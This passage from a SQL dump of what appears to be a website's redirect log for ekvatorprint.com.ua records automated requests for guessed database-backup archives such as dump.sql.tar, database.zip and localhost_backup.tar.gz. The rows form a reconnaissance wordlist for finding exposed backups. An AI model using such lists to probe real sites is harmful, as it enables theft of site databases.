00:00:00',301),(10686,'http://ekvatorprint.com.ua/localhost-dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:36','0000-00-00 00:00:00',301),(10687,'http://ekvatorprint.com.ua/localhostbackup.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:36','0000-00-00 00:00:00',301),(10688,'http://ekvatorprint.com.ua/localhost_backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:37','0000-00-00 00:00:00',301),(10689,'http://ekvatorprint.com.ua/localhost-backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:37','0000-00-00 00:00:00',301),(10690,'http://ekvatorprint.com.ua/backuplocalhost.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:37','0000-00-00 00:00:00',301),(10691,'http://ekvatorprint.com.ua/backup-localhost.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:37','0000-00-00 00:00:00',301),(10692,'http://ekvatorprint.com.ua/backup_localhost.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:37','0000-00-00 00:00:00',301),(10693,'http://ekvatorprint.com.ua/ekvatorprint.com.uadb.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:38','0000-00-00 00:00:00',301),(10694,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_db.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:38','0000-00-00 00:00:00',301),(10695,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-db.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:38','0000-00-00 00:00:00',301),(10696,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_database.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:38','0000-00-00 00:00:00',301),(10697,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-database.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:38','0000-00-00 00:00:00',301),(10698,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:39','0000-00-00 00:00:00',301),(10699,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:40','0000-00-00 00:00:00',301),(10700,'http://ekvatorprint.com.ua/ekvatorprint.com.uabackup.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:41','0000-00-00 00:00:00',301),(10701,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:42','0000-00-00 00:00:00',301),(10702,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:43','0000-00-00 00:00:00',301),(10703,'http://ekvatorprint.com.ua/backupekvatorprint.com.ua.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:43','0000-00-00 00:00:00',301),(10704,'http://ekvatorprint.com.ua/backup-ekvatorprint.com.ua.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:46','0000-00-00 00:00:00',301),(10705,'http://ekvatorprint.com.ua/backup_ekvatorprint.com.ua.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:46','0000-00-00 00:00:00',301),(10706,'http://ekvatorprint.com.ua/ekvatorprint.sql.gz',NULL,'','',3,0,'2017-08-16 17:18:46','0000-00-00 00:00:00',301),(10707,'http://ekvatorprint.com.ua/ekvatorprintdb.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:47','0000-00-00 00:00:00',301),(10708,'http://ekvatorprint.com.ua/ekvatorprint_db.sql.gz',NULL,'','',2,0,'2017-08-16 17:18:47','0000-00-00 00:00:00',301),(10709,'http://ekvatorprint.com.ua/ekvatorprint-db.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:47','0000-00-00 00:00:00',301),(10710,'http://ekvatorprint.com.ua/ekvatorprint_database.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:47','0000-00-00 00:00:00',301),(10711,'http://ekvatorprint.com.ua/ekvatorprint-database.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:48','0000-00-00 00:00:00',301),(10712,'http://ekvatorprint.com.ua/ekvatorprint_dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:48','0000-00-00 00:00:00',301),(10713,'http://ekvatorprint.com.ua/ekvatorprint-dump.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:48','0000-00-00 00:00:00',301),(10714,'http://ekvatorprint.com.ua/ekvatorprintbackup.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:48','0000-00-00 00:00:00',301),(10715,'http://ekvatorprint.com.ua/ekvatorprint-backup.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:48','0000-00-00 00:00:00',301),(10716,'http://ekvatorprint.com.ua/backupekvatorprint.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:49','0000-00-00 00:00:00',301),(10717,'http://ekvatorprint.com.ua/backup-ekvatorprint.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:50','0000-00-00 00:00:00',301),(10718,'http://ekvatorprint.com.ua/backup_ekvatorprint.sql.gz',NULL,'','',1,0,'2017-08-16 17:18:50','0000-00-00 00:00:00',301),(10719,'http://ekvatorprint.com.ua/db.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:50','0000-00-00 00:00:00',301),(10720,'http://ekvatorprint.com.ua/dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:50','0000-00-00 00:00:00',301),(10721,'http://ekvatorprint.com.ua/dbdump.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:50','0000-00-00 00:00:00',301),(10722,'http://ekvatorprint.com.ua/database.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:50','0000-00-00 00:00:00',301),(10723,'http://ekvatorprint.com.ua/backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:51','0000-00-00 00:00:00',301),(10724,'http://ekvatorprint.com.ua/localhost.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:51','0000-00-00 00:00:00',301),(10725,'http://ekvatorprint.com.ua/localhostdb.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:51','0000-00-00 00:00:00',301),(10726,'http://ekvatorprint.com.ua/localhost_db.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:51','0000-00-00 00:00:00',301),(10727,'http://ekvatorprint.com.ua/localhost-db.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:52','0000-00-00 00:00:00',301),(10728,'http://ekvatorprint.com.ua/localhost_database.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:52','0000-00-00 00:00:00',301),(10729,'http://ekvatorprint.com.ua/localhost-database.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:52','0000-00-00 00:00:00',301),(10730,'http://ekvatorprint.com.ua/localhost_dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:52','0000-00-00 00:00:00',301),(10731,'http://ekvatorprint.com.ua/localhost-dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:52','0000-00-00 00:00:00',301),(10732,'http://ekvatorprint.com.ua/localhostbackup.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:52','0000-00-00 00:00:00',301),(10733,'http://ekvatorprint.com.ua/localhost_backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:52','0000-00-00 00:00:00',301),(10734,'http://ekvatorprint.com.ua/localhost-backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:53','0000-00-00 00:00:00',301),(10735,'http://ekvatorprint.com.ua/backuplocalhost.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:53','0000-00-00 00:00:00',301),(10736,'http://ekvatorprint.com.ua/backup-localhost.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:53','0000-00-00 00:00:00',301),(10737,'http://ekvatorprint.com.ua/backup_localhost.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:53','0000-00-00 00:00:00',301),(10738,'http://ekvatorprint.com.ua/ekvatorprint.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:53','0000-00-00 00:00:00',301),(10739,'http://ekvatorprint.com.ua/ekvatorprintdb.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:54','0000-00-00 00:00:00',301),(10740,'http://ekvatorprint.com.ua/ekvatorprint_db.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:54','0000-00-00 00:00:00',301),(10741,'http://ekvatorprint.com.ua/ekvatorprint-db.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:54','0000-00-00 00:00:00',301),(10742,'http://ekvatorprint.com.ua/ekvatorprint_database.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:54','0000-00-00 00:00:00',301),(10743,'http://ekvatorprint.com.ua/ekvatorprint-database.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:54','0000-00-00 00:00:00',301),(10744,'http://ekvatorprint.com.ua/ekvatorprint_dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:55','0000-00-00 00:00:00',301),(10745,'http://ekvatorprint.com.ua/ekvatorprint-dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:55','0000-00-00 00:00:00',301),(10746,'http://ekvatorprint.com.ua/ekvatorprintbackup.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:55','0000-00-00 00:00:00',301),(10747,'http://ekvatorprint.com.ua/ekvatorprint_backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:55','0000-00-00 00:00:00',301),(10748,'http://ekvatorprint.com.ua/ekvatorprint-backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:56','0000-00-00 00:00:00',301),(10749,'http://ekvatorprint.com.ua/backupekvatorprint.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:57','0000-00-00 00:00:00',301),(10750,'http://ekvatorprint.com.ua/backup-ekvatorprint.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:58','0000-00-00 00:00:00',301),(10751,'http://ekvatorprint.com.ua/backup_ekvatorprint.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:58','0000-00-00 00:00:00',301),(10752,'http://ekvatorprint.com.ua/ekvatorprint.com.ua.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:58','0000-00-00 00:00:00',301),(10753,'http://ekvatorprint.com.ua/ekvatorprint.com.uadb.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:58','0000-00-00 00:00:00',301),(10754,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_db.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:59','0000-00-00 00:00:00',301),(10755,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-db.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:59','0000-00-00 00:00:00',301),(10756,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_database.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:59','0000-00-00 00:00:00',301),(10757,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-database.sql.tar',NULL,'','',1,0,'2017-08-16 17:18:59','0000-00-00 00:00:00',301),(10758,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:19:00','0000-00-00 00:00:00',301),(10759,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-dump.sql.tar',NULL,'','',1,0,'2017-08-16 17:19:00','0000-00-00 00:00:00',301),(10760,'http://ekvatorprint.com.ua/ekvatorprint.com.uabackup.sql.tar',NULL,'','',1,0,'2017-08-16 17:19:00','0000-00-00 00:00:00',301),(10761,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:19:02','0000-00-00 00:00:00',301),(10762,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-backup.sql.tar',NULL,'','',1,0,'2017-08-16 17:19:02','0000-00-00 00:00:00',301),(10763,'http://ekvatorprint.com.ua/backupekvatorprint.com.ua.sql.tar',NULL,'','',1,0,'2017-08-16 17:19:02','0000-00-00 00:00:00',301),(10764,'http://ekvatorprint.com.ua/backup-ekvatorprint.com.ua.sql.tar',NULL,'','',1,0,'2017-08-16 17:19:02','0000-00-00 00:00:00',301),(10765,'http://ekvatorprint.com.ua/backup_ekvatorprint.com.ua.sql.tar',NULL,'','',1,0,'2017-08-16 17:19:02','0000-00-00 00:00:00',301),(10766,'http://ekvatorprint.com.ua/dbdump.zip',NULL,'','',1,0,'2017-08-16 17:19:02','0000-00-00 00:00:00',301),(10767,'http://ekvatorprint.com.ua/database.zip',NULL,'','',2,0,'2017-08-16 17:19:03','0000-00-00 00:00:00',301),(10768,'http://ekvatorprint.com.ua/localhost.zip',NULL,'','',2,0,'2017-08-16 17:19:03','0000-00-00 00:00:00',301),(10769,'http://ekvatorprint.com.ua/localhostdb.zip',NULL,'','',1,0,'2017-08-16 17:19:03','0000-00-00 00:00:00',301),(10770,'http://ekvatorprint.com.ua/localhost_db.zip',NULL,'','',1,0,'2017-08-16 17:19:03','0000-00-00 00:00:00',301),(10771,'http://ekvatorprint.com.ua/localhost-db.zip',NULL,'','',1,0,'2017-08-16 17:19:03','0000-00-00 00:00:00',301),(10772,'http://ekvatorprint.com.ua/localhost_database.zip',NULL,'','',1,0,'2017-08-16 17:19:04','0000-00-00 00:00:00',301),(10773,'http://ekvatorprint.com.ua/localhost-database.zip',NULL,'','',1,0,'2017-08-16 17:19:04','0000-00-00 00:00:00',301),(10774,'http://ekvatorprint.com.ua/localhost_dump.zip',NULL,'','',1,0,'2017-08-16 17:19:04','0000-00-00 00:00:00',301),(10775,'http://ekvatorprint.com.ua/localhost-dump.zip',NULL,'','',1,0,'2017-08-16 17:19:04','0000-00-00 00:00:00',301),(10776,'http://ekvatorprint.com.ua/localhostbackup.zip',NULL,'','',1,0,'2017-08-16 17:19:04','0000-00-00 00:00:00',301),(10777,'http://ekvatorprint.com.ua/localhost_backup.zip',NULL,'','',1,0,'2017-08-16 17:19:05','0000-00-00 00:00:00',301),(10778,'http://ekvatorprint.com.ua/localhost-backup.zip',NULL,'','',1,0,'2017-08-16 17:19:05','0000-00-00 00:00:00',301),(10779,'http://ekvatorprint.com.ua/backuplocalhost.zip',NULL,'','',1,0,'2017-08-16 17:19:05','0000-00-00 00:00:00',301),(10780,'http://ekvatorprint.com.ua/backup-localhost.zip',NULL,'','',1,0,'2017-08-16 17:19:05','0000-00-00 00:00:00',301),(10781,'http://ekvatorprint.com.ua/backup_localhost.zip',NULL,'','',1,0,'2017-08-16 17:19:05','0000-00-00 00:00:00',301),(10782,'http://ekvatorprint.com.ua/ekvatorprint.com.uadb.zip',NULL,'','',1,0,'2017-08-16 17:19:06','0000-00-00 00:00:00',301),(10783,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_db.zip',NULL,'','',1,0,'2017-08-16 17:19:06','0000-00-00 00:00:00',301),(10784,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-db.zip',NULL,'','',1,0,'2017-08-16 17:19:06','0000-00-00 00:00:00',301),(10785,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_database.zip',NULL,'','',1,0,'2017-08-16 17:19:06','0000-00-00 00:00:00',301),(10786,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-database.zip',NULL,'','',1,0,'2017-08-16 17:19:06','0000-00-00 00:00:00',301),(10787,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_dump.zip',NULL,'','',1,0,'2017-08-16 17:19:06','0000-00-00 00:00:00',301),(10788,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-dump.zip',NULL,'','',1,0,'2017-08-16 17:19:07','0000-00-00 00:00:00',301),(10789,'http://ekvatorprint.com.ua/ekvatorprint.com.uabackup.zip',NULL,'','',1,0,'2017-08-16 17:19:08','0000-00-00 00:00:00',301),(10790,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_backup.zip',NULL,'','',1,0,'2017-08-16 17:19:08','0000-00-00 00:00:00',301),(10791,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-backup.zip',NULL,'','',1,0,'2017-08-16 17:19:08','0000-00-00 00:00:00',301),(10792,'http://ekvatorprint.com.ua/backupekvatorprint.com.ua.zip',NULL,'','',1,0,'2017-08-16 17:19:08','0000-00-00 00:00:00',301),(10793,'http://ekvatorprint.com.ua/backup-ekvatorprint.com.ua.zip',NULL,'','',1,0,'2017-08-16 17:19:08','0000-00-00 00:00:00',301),(10794,'http://ekvatorprint.com.ua/backup_ekvatorprint.com.ua.zip',NULL,'','',1,0,'2017-08-16 17:19:08','0000-00-00 00:00:00',301),(10795,'http://ekvatorprint.com.ua/ekvatorprint.zip',NULL,'','',3,0,'2017-08-16 17:19:10','0000-00-00 00:00:00',301),(10796,'http://ekvatorprint.com.ua/ekvatorprintdb.zip',NULL,'','',1,0,'2017-08-16 17:19:10','0000-00-00 00:00:00',301),(10797,'http://ekvatorprint.com.ua/ekvatorprint_db.zip',NULL,'','',1,0,'2017-08-16 17:19:11','0000-00-00 00:00:00',301),(10798,'http://ekvatorprint.com.ua/ekvatorprint-db.zip',NULL,'','',1,0,'2017-08-16 17:19:11','0000-00-00 00:00:00',301),(10799,'http://ekvatorprint.com.ua/ekvatorprint_database.zip',NULL,'','',1,0,'2017-08-16 17:19:12','0000-00-00 00:00:00',301),(10800,'http://ekvatorprint.com.ua/ekvatorprint-database.zip',NULL,'','',1,0,'2017-08-16 17:19:12','0000-00-00 00:00:00',301),(10801,'http://ekvatorprint.com.ua/ekvatorprint_dump.zip',NULL,'','',1,0,'2017-08-16 17:19:12','0000-00-00 00:00:00',301),(10802,'http://ekvatorprint.com.ua/ekvatorprint-dump.zip',NULL,'','',1,0,'2017-08-16 17:19:12','0000-00-00 00:00:00',301),(10803,'http://ekvatorprint.com.ua/ekvatorprintbackup.zip',NULL,'','',1,0,'2017-08-16 17:19:12','0000-00-00 00:00:00',301),(10804,'http://ekvatorprint.com.ua/ekvatorprint_backup.zip',NULL,'','',2,0,'2017-08-16 17:19:13','0000-00-00 00:00:00',301),(10805,'http://ekvatorprint.com.ua/ekvatorprint-backup.zip',NULL,'','',1,0,'2017-08-16 17:19:13','0000-00-00 00:00:00',301),(10806,'http://ekvatorprint.com.ua/backupekvatorprint.zip',NULL,'','',1,0,'2017-08-16 17:19:13','0000-00-00 00:00:00',301),(10807,'http://ekvatorprint.com.ua/backup-ekvatorprint.zip',NULL,'','',1,0,'2017-08-16 17:19:13','0000-00-00 00:00:00',301),(10808,'http://ekvatorprint.com.ua/backup_ekvatorprint.zip',NULL,'','',1,0,'2017-08-16 17:19:13','0000-00-00 00:00:00',301),(10809,'http://ekvatorprint.com.ua/dbdump.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:14','0000-00-00 00:00:00',301),(10810,'http://ekvatorprint.com.ua/database.tar.gz',NULL,'','',2,0,'2017-08-16 17:19:14','0000-00-00 00:00:00',301),(10811,'http://ekvatorprint.com.ua/localhost.tar.gz',NULL,'','',2,0,'2017-08-16 17:19:14','0000-00-00 00:00:00',301),(10812,'http://ekvatorprint.com.ua/localhostdb.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:14','0000-00-00 00:00:00',301),(10813,'http://ekvatorprint.com.ua/localhost_db.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:15','0000-00-00 00:00:00',301),(10814,'http://ekvatorprint.com.ua/localhost-db.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:15','0000-00-00 00:00:00',301),(10815,'http://ekvatorprint.com.ua/localhost_database.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:15','0000-00-00 00:00:00',301),(10816,'http://ekvatorprint.com.ua/localhost-database.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:15','0000-00-00 00:00:00',301),(10817,'http://ekvatorprint.com.ua/localhost_dump.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:15','0000-00-00 00:00:00',301),(10818,'http://ekvatorprint.com.ua/localhost-dump.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:16','0000-00-00 00:00:00',301),(10819,'http://ekvatorprint.com.ua/localhostbackup.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:16','0000-00-00 00:00:00',301),(10820,'http://ekvatorprint.com.ua/localhost_backup.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:16','0000-00-00 00:00:00',301),(10821,'http://ekvatorprint.com.ua/localhost-backup.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:16','0000-00-00 00:00:00',301),(10822,'http://ekvatorprint.com.ua/backuplocalhost.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:16','0000-00-00 00:00:00',301),(10823,'http://ekvatorprint.com.ua/backup-localhost.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:16','0000-00-00 00:00:00',301),(10824,'http://ekvatorprint.com.ua/backup_localhost.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:17','0000-00-00 00:00:00',301),(10825,'http://ekvatorprint.com.ua/ekvatorprintdb.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:17','0000-00-00 00:00:00',301),(10826,'http://ekvatorprint.com.ua/ekvatorprint_db.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:17','0000-00-00 00:00:00',301),(10827,'http://ekvatorprint.com.ua/ekvatorprint-db.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:17','0000-00-00 00:00:00',301),(10828,'http://ekvatorprint.com.ua/ekvatorprint_database.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:17','0000-00-00 00:00:00',301),(10829,'http://ekvatorprint.com.ua/ekvatorprint-database.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:17','0000-00-00 00:00:00',301),(10830,'http://ekvatorprint.com.ua/ekvatorprint_dump.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:17','0000-00-00 00:00:00',301),(10831,'http://ekvatorprint.com.ua/ekvatorprint-dump.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:18','0000-00-00 00:00:00',301),(10832,'http://ekvatorprint.com.ua/ekvatorprintbackup.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:18','0000-00-00 00:00:00',301),(10833,'http://ekvatorprint.com.ua/ekvatorprint_backup.tar.gz',NULL,'','',2,0,'2017-08-16 17:19:18','0000-00-00 00:00:00',301),(10834,'http://ekvatorprint.com.ua/ekvatorprint-backup.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:19','0000-00-00 00:00:00',301),(10835,'http://ekvatorprint.com.ua/backupekvatorprint.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:19','0000-00-00 00:00:00',301),(10836,'http://ekvatorprint.com.ua/backup-ekvatorprint.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:20','0000-00-00 00:00:00',301),(10837,'http://ekvatorprint.com.ua/backup_ekvatorprint.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:20','0000-00-00 00:00:00',301),(10838,'http://ekvatorprint.com.ua/ekvatorprint.com.uadb.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:20','0000-00-00 00:00:00',301),(10839,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_db.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:20','0000-00-00 00:00:00',301),(10840,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-db.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:21','0000-00-00 00:00:00',301),(10841,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_database.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:21','0000-00-00 00:00:00',301),(10842,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-database.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:21','0000-00-00 00:00:00',301),(10843,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_dump.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:22','0000-00-00 00:00:00',301),(10844,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-dump.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:22','0000-00-00 00:00:00',301),(10845,'http://ekvatorprint.com.ua/ekvatorprint.com.uabackup.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:22','0000-00-00 00:00:00',301),(10846,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_backup.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:22','0000-00-00 00:00:00',301),(10847,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-backup.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:22','0000-00-00 00:00:00',301),(10848,'http://ekvatorprint.com.ua/backupekvatorprint.com.ua.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:22','0000-00-00 00:00:00',301),(10849,'http://ekvatorprint.com.ua/backup-ekvatorprint.com.ua.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:23','0000-00-00 00:00:00',301),(10850,'http://ekvatorprint.com.ua/backup_ekvatorprint.com.ua.tar.gz',NULL,'','',1,0,'2017-08-16 17:19:23','0000-00-00 00:00:00',301),(10851,'http://ekvatorprint.com.ua/dbdump.tar',NULL,'','',1,0,'2017-08-16 17:19:24','0000-00-00 00:00:00',301),(10852,'http://ekvatorprint.com.ua/database.tar',NULL,'','',2,0,'2017-08-16 17:19:24','0000-00-00 00:00:00',301),(10853,'http://ekvatorprint.com.ua/localhost.tar',NULL,'','',1,0,'2017-08-16 17:19:25','0000-00-00 00:00:00',301),(10854,'http://ekvatorprint.com.ua/localhostdb.tar',NULL,'','',1,0,'2017-08-16 17:19:25','0000-00-00 00:00:00',301),(10855,'http://ekvatorprint.com.ua/localhost_db.tar',NULL,'','',1,0,'2017-08-16 17:19:26','0000-00-00 00:00:00',301),(10856,'http://ekvatorprint.com.ua/localhost-db.tar',NULL,'','',1,0,'2017-08-16 17:19:26','0000-00-00 00:00:00',301),(10857,'http://ekvatorprint.com.ua/localhost_database.tar',NULL,'','',1,0,'2017-08-16 17:19:26','0000-00-00 00:00:00',301),(10858,'http://ekvatorprint.com.ua/localhost-database.tar',NULL,'','',1,0,'2017-08-16 17:19:26','0000-00-00 00:00:00',301),(10859,'http://ekvatorprint.com.ua/localhost_dump.tar',NULL,'','',1,0,'2017-08-16 17:19:26','0000-00-00 00:00:00',301),(10860,'http://ekvatorprint.com.ua/localhost-dump.tar',NULL,'','',1,0,'2017-08-16 17:19:27','0000-00-00 00:00:00',301),(10861,'http://ekvatorprint.com.ua/localhostbackup.tar',NULL,'','',1,0,'2017-08-16 17:19:27','0000-00-00 00:00:00',301),(10862,'http://ekvatorprint.com.ua/localhost_backup.tar',NULL,'','',1,0,'2017-08-16 17:19:27','0000-00-00 00:00:00',301),(10863,'http://ekvatorprint.com.ua/localhost-backup.tar',NULL,'','',1,0,'2017-08-16 17:19:27','0000-00-00 00:00:00',301),(10864,'http://ekvatorprint.com.ua/backuplocalhost.tar',NULL,'','',1,0,'2017-08-16 17:19:28','0000-00-00 00:00:00',301),(10865,'http://ekvatorprint.com.ua/backup-localhost.tar',NULL,'','',1,0,'2017-08-16 17:19:28','0000-00-00 00:00:00',301),(10866,'http://ekvatorprint.com.ua/backup_localhost.tar',NULL,'','',1,0,'2017-08-16 17:19:28','0000-00-00 00:00:00',301),(10867,'http://ekvatorprint.com.ua/ekvatorprint.com.uadb.tar',NULL,'','',1,0,'2017-08-16 17:19:29','0000-00-00 00:00:00',301),(10868,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_db.tar',NULL,'','',1,0,'2017-08-16 17:19:29','0000-00-00 00:00:00',301),(10869,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-db.tar',NULL,'','',1,0,'2017-08-16 17:19:30','0000-00-00 00:00:00',301),(10870,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_database.tar',NULL,'','',1,0,'2017-08-16 17:19:30','0000-00-00 00:00:00',301),(10871,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-database.tar',NULL,'','',1,0,'2017-08-16 17:19:30','0000-00-00 00:00:00',301),(10872,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_dump.tar',NULL,'','',1,0,'2017-08-16 17:19:30','0000-00-00 00:00:00',301),(10873,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-dump.tar',NULL,'','',1,0,'2017-08-16 17:19:30','0000-00-00 00:00:00',301),(10874,'http://ekvatorprint.com.ua/ekvatorprint.com.uabackup.tar',NULL,'','',1,0,'2017-08-16 17:19:31','0000-00-00 00:00:00',301),(10875,'http://ekvatorprint.com.ua/ekvatorprint.com.ua_backup.tar',NULL,'','',1,0,'2017-08-16 17:19:31','0000-00-00 00:00:00',301),(10876,'http://ekvatorprint.com.ua/ekvatorprint.com.ua-backup.tar',NULL,'','',1,0,'2017-08-16 17:19:31','0000-00-00 00:00:00',301),(10877,'http://ekvatorprint.com.ua/backupekvatorprint.com.ua.tar',NULL,'','',1,0,'2017-08-16 17:19:32','0000-00-00 00:00:00',301),(10878,'http://ekvatorprint.com.ua/backup-ekvatorprint.com.ua.tar',NULL,'','',1,0,'2017-08-16 17:19:32','0000-00-00 00:00:00',301),(10879,'http://ekvatorprint.com.ua/backup_ekvatorprint.com.ua.tar',NULL,'','',1,0,'2017-08-16 17:19:32','0000-00-00 00:00:00',301),(10880,'http://ekvatorprint.com.ua/ekvatorprintdb.tar',NULL,'','',1,0,'2017-08-16 17:19:33','0000-00-00 00:00:00',301),(10881,'http://ekvatorprint.com.ua/ekvatorprint_db.tar',NULL,'','',1,0,'2017-08-16 17:19:33','0000-00-00 00:00:00',301),(10882,'http://ekvatorprint.com.ua/ekvatorprint-db.tar',NULL,'','',1,0,'2017-08-16 17:19:33','0000-00-00 00:00:00',301),(10883,'http://ekvatorprint.com.ua/ekvatorprint_database.tar',NULL,'','',1,0,'2017-08-16 17:19:34','0000-00-00 00:00:00',301),(10884,'http://ekvatorprint.com.ua/ekvatorprint-database.tar',NULL,'','',1,0,'2017-08-16 17:19:34','0000-00-00 